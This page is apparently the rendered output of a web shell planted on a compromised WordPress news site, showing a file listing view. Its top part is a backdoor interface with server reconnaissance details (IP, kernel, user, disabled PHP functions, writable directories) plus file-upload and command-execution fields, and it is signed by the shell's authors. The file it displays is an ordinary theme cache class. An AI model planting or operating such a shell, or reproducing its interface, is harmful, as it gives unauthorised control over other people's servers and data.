AVRIL_START_JANCOKALIVEAVRIL_END_JANCOK Interactive Terminal

Command Executor


Warning: chmod(): Operation not permitted in /www/wwwroot/dzynews.com/wp-content/plugins/fileorganizer/fileorganizer.php on line 8
403WebShell
403Webshell
Server IP : dzynews.com  /  Your IP : 216.73.217.105
Web Server : nginx/1.30.3
System : Linux cloud-tdkldl-avd6 5.15.0-91-generic #101-Ubuntu SMP Tue Nov 14 13:30:08 UTC 2023 x86_64
User : www ( 1000)
PHP Version : 8.2.31
Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /www/wwwroot/dzynews.com/wp-content/themes/archive-document/Modules/Common/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /www/wwwroot/dzynews.com/wp-content/themes/archive-document/Modules/Common//Cache.php
<?php namespace B2\Modules\Common;

class Cache{

    public function init(){
        add_action('b2_user_social_login', array(__CLASS__,'clean_user_public_data'));
        add_action('b2_user_save_cover', array(__CLASS__,'clean_user_public_data'));
        add_action('b2_user_save_avatar', array(__CLASS__,'clean_user_public_data'));
        add_action('b2_user_rebuild_lv', array(__CLASS__,'clean_user_public_data'));
        add_action('b2_user_rebuild_vip', array(__CLASS__,'clean_user_public_data'));
        add_action('b2_user_rebuild_money', array(__CLASS__,'clean_user_public_data'));
        add_action('b2_user_rebuild_open', array(__CLASS__,'clean_user_public_data'));
        add_action('b2_user_rebuild_sex', array(__CLASS__,'clean_user_public_data'));
        add_action('b2_user_rebuild_desc', array(__CLASS__,'clean_user_public_data'));
        add_action('b2_user_rebuild_name', array(__CLASS__,'clean_user_public_data'));
        add_action('b2_user_rebuild_url', array(__CLASS__,'clean_user_public_data'));
        add_action('b2_user_rebuild_title', array(__CLASS__,'clean_user_public_data'));
    }

    public static function clean_index_module_cache(){
        $count = get_option('b2_template_index');
        if($count){
            $count = isset($count['index_group']) ? count($count['index_group']) : 0;

            if($count){
                $key = md5(B2_HOME_URI);
                for ($i=0; $i < $count+1; $i++) { 
                    delete_transient($key.'_b2_index_module_'.$i);
                }
            }
        }
    }

    public static function clean_user_public_data($user_id){
        delete_transient('b2_user_'.$user_id);
    }

}

Youez - 2016 - github.com/yon3zu
LinuXploit